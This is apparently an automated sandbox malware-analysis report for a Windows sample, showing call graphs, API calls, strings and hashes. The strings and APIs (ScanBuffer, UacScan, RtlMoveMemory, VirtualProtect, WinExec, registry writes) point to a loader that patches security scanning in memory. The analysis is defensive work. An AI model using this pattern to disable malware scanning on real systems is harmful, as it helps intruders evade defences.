28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c47b0 call 28c4964 WinExec call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4964 call 28c4698 call 28d9e70 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c3694 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 10668->10743 10669->10668 10861 28e6b54-28e6cd7 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c48b0 10742->10861 10862 28e6395-28e69b4 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c2ee0 call 28c2f08 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 GetCurrentProcess call 28d7968 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 10742->10862 11306 28e5cba-28e5f98 call 28d5aa8 call 28c4b90 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c49bc RtlMoveMemory call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28da1c0 call 28c36c4 10743->11306 11307 28e5cb5-28e5cb8 10743->11307 10996 28e6cdd-28e6cec call 28c48b0 10861->10996 10997 28e74a8-28e8b96 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4698 * 2 call 28d7be8 call 28c4698 * 2 call 28d7be8 call 28c4698 * 2 call 28d7be8 call 28c4698 * 2 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4698 * 2 call 28d7be8 call 28c4698 * 2 call 28d7be8 call 28c4698 * 2 call 28d7be8 call 28c4698 * 2 call 28d7be8 call 28c4698 * 2 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4698 * 2 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4698 * 2 call 28d7be8 call 28c4698 * 2 call 28d7be8 call 28c4698 * 2 call 28d7be8 call 28c4698 * 2 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4698 * 2 call 28d7be8 call 28c4698 * 2 call 28d7be8 call 28c4698 * 2 call 28d7be8 call 28c4698 * 2 call 28d7be8 call 28c4698 * 2 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 * 16 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4698 * 2 call 28d7be8 call 28c4698 * 2 call 28d7be8 call 28c4698 * 2 call 28d7be8 call 28c4698 * 2 call 28d7be8 call 28c4698 * 2 call 28d7be8 call 28c4698 * 2 call 28d7be8 call 28c4698 * 2 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4698 * 2 call 28d7be8 call 28c4698 * 2 call 28d7be8 call 28c4698 * 2 call 28d7be8 call 28c4698 * 2 call 28d7be8 call 28c4698 * 2 call 28d7be8 call 28c4698 * 2 call 28d7be8 call 28c4698 * 2 call 28d7be8 call 28c4698 * 2 call 28d7be8 call 28c4698 * 2 call 28d7be8 call 28c4698 * 2 call 28d7be8 call 28c4698 * 2 call 28d7be8 call 28c4698 * 2 call 28d7be8 call 28c4698 * 2 call 28d7be8 call 28c4698 * 2 call 28d7be8 call 28c4698 * 2 call 28d7be8 call 28c4698 * 2 call 28d7be8 call 28c4698 * 2 call 28d7be8 call 28c4698 * 2 call 28d7be8 call 28c4698 * 2 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 ExitProcess 10861->10997 11562 28e69bb-28e6b4f call 28c49bc call 28dc5bc call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 EnumSystemLocalesA 10862->11562 11563 28e69b6-28e69b9 10862->11563 10996->10997 11009 28e6cf2-28e6fc5 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28dd198 call 28c4824 call 28c4964 call 28c4698 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c7e18 10996->11009 11334 28e6fcb-28e729d call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28dc74c call 28c44f4 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4da4 * 2 call 28c4728 call 28dc3f8 11009->11334 11335 28e72a2-28e74a3 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c49bc call 28d7f48 11009->11335 11307->11306 11334->11335 11335->10997 11562->10861 11563->11562
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 028D7BE8: LoadLibraryW.KERNEL32(?,00000000,028D7C9A), ref: 028D7C18
                                                                                                                                                                      • Part of subcall function 028D7BE8: GetModuleHandleW.KERNEL32(?,?,00000000,028D7C9A), ref: 028D7C1E
                                                                                                                                                                      • Part of subcall function 028D7BE8: GetProcAddress.KERNEL32(00000000,00000000), ref: 028D7C37
                                                                                                                                                                      • Part of subcall function 028DD318: RegOpenKeyA.ADVAPI32(?,00000000,02924798), ref: 028DD35C
                                                                                                                                                                      • Part of subcall function 028DD318: RegSetValueExA.ADVAPI32(00000874,00000000,00000000,00000001,00000000,0000001C,00000000,028DD3C7), ref: 028DD394
                                                                                                                                                                      • Part of subcall function 028DD318: RegCloseKey.ADVAPI32(00000874,00000874,00000000,00000000,00000001,00000000,0000001C,00000000,028DD3C7), ref: 028DD39F
                                                                                                                                                                    • WinExec.KERNEL32(00000000,00000000), ref: 028E57F9
                                                                                                                                                                      • Part of subcall function 028D9E70: CompareStringA.KERNEL32(00000400,00000001,00000000,?,00000000), ref: 028D9F33
                                                                                                                                                                    • RtlMoveMemory.N(00000000,?,00000000,?,ScanBuffer,02924344,028E8FEC,UacScan,02924344,028E8FEC,OpenSession,02924344,028E8FEC,OpenSession,02924344,028E8FEC), ref: 028E5D7B
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1720484303.00000000028C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.1720466208.00000000028C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.1720579954.00000000028EB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_28c0000_SHEOrder-10524.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AddressCloseCompareExecHandleLibraryLoadMemoryModuleMoveOpenProcStringValue
                                                                                                                                                                    • String ID: C:\Users\Public\$C:\Windows\System32\$Initialize$OpenSession$ScanBuffer$ScanString$UacInitialize$UacScan
                                                                                                                                                                    • API String ID: 897696978-872072817
                                                                                                                                                                    • Opcode ID: cd85b16b4847b9e397fbeeeb84fdd3195d139880b98f1413495f4d48d129927d
                                                                                                                                                                    • Instruction ID: 0580eaa9a483b9f5ce7385b93de8ed50334e8a5f78e0f56fb7e397099ebc1159
                                                                                                                                                                    • Opcode Fuzzy Hash: cd85b16b4847b9e397fbeeeb84fdd3195d139880b98f1413495f4d48d129927d
                                                                                                                                                                    • Instruction Fuzzy Hash: 6A92F93CA441689FDF64EB68D890DDD73B6AB45300F2044A9A149E7724DBB0EEC9CF52
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 028C1724 Relevance: 9.0, APIs: 7, Instructions: 289sleepCOMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 12450 28c1724-28c1736 12451 28c173c-28c174c 12450->12451 12452 28c1968-28c196d 12450->12452 12453 28c174e-28c175b 12451->12453 12454 28c17a4-28c17ad 12451->12454 12455 28c1a80-28c1a83 12452->12455 12456 28c1973-28c1984 12452->12456 12457 28c175d-28c176a 12453->12457 12458 28c1774-28c1780 12453->12458 12454->12453 12461 28c17af-28c17bb 12454->12461 12462 28c1a89-28c1a8b 12455->12462 12463 28c1684-28c16ad VirtualAlloc 12455->12463 12459 28c1938-28c1945 12456->12459 12460 28c1986-28c19a2 12456->12460 12466 28c176c-28c1770 12457->12466 12467 28c1794-28c17a1 12457->12467 12469 28c17f0-28c17f9 12458->12469 12470 28c1782-28c1790 12458->12470 12459->12460 12468 28c1947-28c195b Sleep 12459->12468 12471 28c19a4-28c19ac 12460->12471 12472 28c19b0-28c19bf 12460->12472 12461->12453 12473 28c17bd-28c17c9 12461->12473 12464 28c16df-28c16e5 12463->12464 12465 28c16af-28c16dc call 28c1644 12463->12465 12465->12464 12468->12460 12475 28c195d-28c1964 Sleep 12468->12475 12480 28c182c-28c1836 12469->12480 12481 28c17fb-28c1808 12469->12481 12476 28c1a0c-28c1a22 12471->12476 12477 28c19d8-28c19e0 12472->12477 12478 28c19c1-28c19d5 12472->12478 12473->12453 12479 28c17cb-28c17de Sleep 12473->12479 12475->12459 12484 28c1a3b-28c1a47 12476->12484 12485 28c1a24-28c1a32 12476->12485 12489 28c19fc-28c19fe call 28c15cc 12477->12489 12490 28c19e2-28c19fa 12477->12490 12478->12476 12479->12453 12488 28c17e4-28c17eb Sleep 12479->12488 12486 28c18a8-28c18b4 12480->12486 12487 28c1838-28c1863 12480->12487 12481->12480 12482 28c180a-28c181e Sleep 12481->12482 12482->12480 12492 28c1820-28c1827 Sleep 12482->12492 12496 28c1a68 12484->12496 12497 28c1a49-28c1a5c 12484->12497 12485->12484 12493 28c1a34 12485->12493 12498 28c18dc-28c18eb call 28c15cc 12486->12498 12499 28c18b6-28c18c8 12486->12499 12494 28c187c-28c188a 12487->12494 12495 28c1865-28c1873 12487->12495 12488->12454 12500 28c1a03-28c1a0b 12489->12500 12490->12500 12492->12481 12493->12484 12502 28c188c-28c18a6 call 28c1500 12494->12502 12503 28c18f8 12494->12503 12495->12494 12501 28c1875 12495->12501 12504 28c1a6d-28c1a7f 12496->12504 12497->12504 12505 28c1a5e-28c1a63 call 28c1500 12497->12505 12510 28c18fd-28c1936 12498->12510 12513 28c18ed-28c18f7 12498->12513 12506 28c18cc-28c18da 12499->12506 12507 28c18ca 12499->12507 12501->12494 12502->12510 12503->12510 12505->12504 12506->12510 12507->12506
                                                                                                                                                                    APIs
                                                                                                                                                                    • Sleep.KERNEL32(00000000,?,028C1FC1), ref: 028C17D0
                                                                                                                                                                    • Sleep.KERNEL32(0000000A,00000000,?,028C1FC1), ref: 028C17E6
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1720484303.00000000028C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.1720466208.00000000028C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.1720579954.00000000028EB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_28c0000_SHEOrder-10524.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Sleep
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3472027048-0
                                                                                                                                                                    • Opcode ID: 2dd8311d14577caa8e4c2c2fe601f7d09d75edf8b5153ce8422bf6dc10a67b94
                                                                                                                                                                    • Instruction ID: 6cb58cccb0153ae22b1be1d4d0c5600a4cdceadf7cda96fc4053251865230e8c
                                                                                                                                                                    • Opcode Fuzzy Hash: 2dd8311d14577caa8e4c2c2fe601f7d09d75edf8b5153ce8422bf6dc10a67b94
                                                                                                                                                                    • Instruction Fuzzy Hash: 04B1F17EA092518BCB25CF28D4C8365BBE1EB84315F2986BDD44DCB287C770D469CB90
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 028D7B20 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 45librarymemoryloaderCOMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    APIs
                                                                                                                                                                    • GetModuleHandleA.KERNEL32(kernel32,00000000,00000000,028D7BA5,?,?,00000000,00000000), ref: 028D7B61
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,kernel32), ref: 028D7B67
                                                                                                                                                                    • VirtualProtect.KERNEL32(?,?,?,?,00000000,kernel32,00000000,00000000,028D7BA5,?,?,00000000,00000000), ref: 028D7B81
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1720484303.00000000028C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.1720466208.00000000028C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.1720579954.00000000028EB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_28c0000_SHEOrder-10524.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AddressHandleModuleProcProtectVirtual
                                                                                                                                                                    • String ID: irtualProtect$kernel32
                                                                                                                                                                    • API String ID: 2099061454-2063912171
                                                                                                                                                                    • Opcode ID: 9639d2a857fc1780c1e418e3d463d9e67c68a4feaf8395cf27c79b6cfde375d2
                                                                                                                                                                    • Instruction ID: 39bd036cb36ef8b4dcb0fa88686f9103e18070439120f45e4e4414df4e8dff5d
                                                                                                                                                                    • Opcode Fuzzy Hash: 9639d2a857fc1780c1e418e3d463d9e67c68a4feaf8395cf27c79b6cfde375d2
                                                                                                                                                                    • Instruction Fuzzy Hash: BE018F7C600248AFE700EFA8DC51E6EB7EDEB48710F614465F904E3740D774EA588A25
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 028C1A8C Relevance: 7.7, APIs: 6, Instructions: 175sleepCOMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 12529 28c1a8c-28c1a9b 12530 28c1b6c-28c1b6f 12529->12530 12531 28c1aa1-28c1aa5 12529->12531 12532 28c1c5c-28c1c60 12530->12532 12533 28c1b75-28c1b7f 12530->12533 12534 28c1b08-28c1b11 12531->12534 12535 28c1aa7-28c1aae 12531->12535 12540 28c16e8-28c170b call 28c1644 VirtualFree 12532->12540 12541 28c1c66-28c1c6b 12532->12541 12536 28c1b3c-28c1b49 12533->12536 12537 28c1b81-28c1b8d 12533->12537 12534->12535 12542 28c1b13-28c1b27 Sleep 12534->12542 12538 28c1adc-28c1ade 12535->12538 12539 28c1ab0-28c1abb 12535->12539 12536->12537 12543 28c1b4b-28c1b5f Sleep 12536->12543 12545 28c1b8f-28c1b92 12537->12545 12546 28c1bc4-28c1bd2 12537->12546 12549 28c1ae0-28c1af1 12538->12549 12550 28c1af3 12538->12550 12547 28c1abd-28c1ac2 12539->12547 12548 28c1ac4-28c1ad9 12539->12548 12557 28c170d-28c1714 12540->12557 12558 28c1716 12540->12558 12542->12535 12551 28c1b2d-28c1b38 Sleep 12542->12551 12543->12537 12552 28c1b61-28c1b68 Sleep 12543->12552 12554 28c1b96-28c1b9a 12545->12554 12546->12554 12556 28c1bd4-28c1bd9 call 28c14c0 12546->12556 12549->12550 12555 28c1af6-28c1b03 12549->12555 12550->12555 12551->12534 12552->12536 12559 28c1bdc-28c1be9 12554->12559 12560 28c1b9c-28c1ba2 12554->12560 12555->12533 12556->12554 12563 28c1719-28c1723 12557->12563 12558->12563 12559->12560 12562 28c1beb-28c1bf2 call 28c14c0 12559->12562 12564 28c1bf4-28c1bfe 12560->12564 12565 28c1ba4-28c1bc2 call 28c1500 12560->12565 12562->12560 12568 28c1c2c-28c1c59 call 28c1560 12564->12568 12569 28c1c00-28c1c28 VirtualFree 12564->12569
                                                                                                                                                                    APIs
                                                                                                                                                                    • Sleep.KERNEL32(00000000,?,?,00000000,028C1FE4), ref: 028C1B17
                                                                                                                                                                    • Sleep.KERNEL32(0000000A,00000000,?,?,00000000,028C1FE4), ref: 028C1B31
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1720484303.00000000028C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.1720466208.00000000028C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.1720579954.00000000028EB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_28c0000_SHEOrder-10524.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Sleep
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3472027048-0
                                                                                                                                                                    • Opcode ID: 1d208d809b645fe27865e9cd346238eeaa0792b098e334e88a8f90c6caca7584
                                                                                                                                                                    • Instruction ID: cebbbb9bbb81cc847e1f94b3d7b97adf07589a444e7346bdd048c89b3c9d455b
                                                                                                                                                                    • Opcode Fuzzy Hash: 1d208d809b645fe27865e9cd346238eeaa0792b098e334e88a8f90c6caca7584
                                                                                                                                                                    • Instruction Fuzzy Hash: F251BC7D6052408FEB25CF6CC9C8766BBD4AB85314F2885AED44CCB287E770D459CBA1
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 028DC8AA Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 112networkCOMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    APIs
                                                                                                                                                                    • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 028DC9EA
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1720484303.00000000028C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.1720466208.00000000028C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.1720579954.00000000028EB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_28c0000_SHEOrder-10524.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CheckConnectionInternet
                                                                                                                                                                    • String ID: Initialize$OpenSession$ScanBuffer
                                                                                                                                                                    • API String ID: 3847983778-3852638603
                                                                                                                                                                    • Opcode ID: 427f31927a265ab544b23a1a314d00a9546891961e9d1d5e4cf974deb9fc75b4
                                                                                                                                                                    • Instruction ID: cc826ca9440af663645841d591638d7ee23ae27c992d5ca671177d91ae61ab38
                                                                                                                                                                    • Opcode Fuzzy Hash: 427f31927a265ab544b23a1a314d00a9546891961e9d1d5e4cf974deb9fc75b4
                                                                                                                                                                    • Instruction Fuzzy Hash: 7941087DA502589BEB10EAA8C850EDEB3FAEF48700F21442AE001E7254DB74E949CB52
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 028D5BE8 Relevance: 4.6, APIs: 3, Instructions: 105fileCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,028D5D30,?,?,028D38BC,00000001), ref: 028D5C44
                                                                                                                                                                    • GetLastError.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,028D5D30,?,?,028D38BC,00000001), ref: 028D5C72
                                                                                                                                                                      • Part of subcall function 028C7D18: CreateFileA.KERNEL32(00000000,00000000,00000000,00000000,00000003,00000080,00000000,?,?,028D38BC,028D5CB2,00000000,028D5D30,?,?,028D38BC), ref: 028C7D66
                                                                                                                                                                      • Part of subcall function 028C7F54: GetFullPathNameA.KERNEL32(00000000,00000104,?,?,?,028D38BC,028D5CCD,00000000,028D5D30,?,?,028D38BC,00000001), ref: 028C7F73
                                                                                                                                                                    • GetLastError.KERNEL32(00000000,028D5D30,?,?,028D38BC,00000001), ref: 028D5CD7
                                                                                                                                                                      • Part of subcall function 028CA734: FormatMessageA.KERNEL32(00003200,00000000,?,00000000,?,00000100,00000000,?,028CC395,00000000,028CC3EF), ref: 028CA753
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1720484303.00000000028C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.1720466208.00000000028C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.1720579954.00000000028EB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_28c0000_SHEOrder-10524.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CreateErrorFileLast$FormatFullMessageNamePath
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 503785936-0
                                                                                                                                                                    • Opcode ID: b082ddc6c56bdeb17a71dd44f199b5cedaecc1080716e2f376d5593a32273224
                                                                                                                                                                    • Instruction ID: ac908e376e7601009ea644bb7498f58ed0750bd82450d194c7e78cd95e9ddc4c
                                                                                                                                                                    • Opcode Fuzzy Hash: b082ddc6c56bdeb17a71dd44f199b5cedaecc1080716e2f376d5593a32273224
                                                                                                                                                                    • Instruction Fuzzy Hash: 1B31797CA006185FEB00EFACC881B9DB7F6AF48314FA08469E504E7380D7799909CF66
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 028DD316 Relevance: 4.6, APIs: 3, Instructions: 59registryCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • RegOpenKeyA.ADVAPI32(?,00000000,02924798), ref: 028DD35C
                                                                                                                                                                    • RegSetValueExA.ADVAPI32(00000874,00000000,00000000,00000001,00000000,0000001C,00000000,028DD3C7), ref: 028DD394
                                                                                                                                                                    • RegCloseKey.ADVAPI32(00000874,00000874,00000000,00000000,00000001,00000000,0000001C,00000000,028DD3C7), ref: 028DD39F
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1720484303.00000000028C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.1720466208.00000000028C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.1720579954.00000000028EB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_28c0000_SHEOrder-10524.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CloseOpenValue
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 779948276-0
                                                                                                                                                                    • Opcode ID: e23bf62c629d75fb63a3d4dd2fb8f77c4957902be58d9bbd09a909529584edba
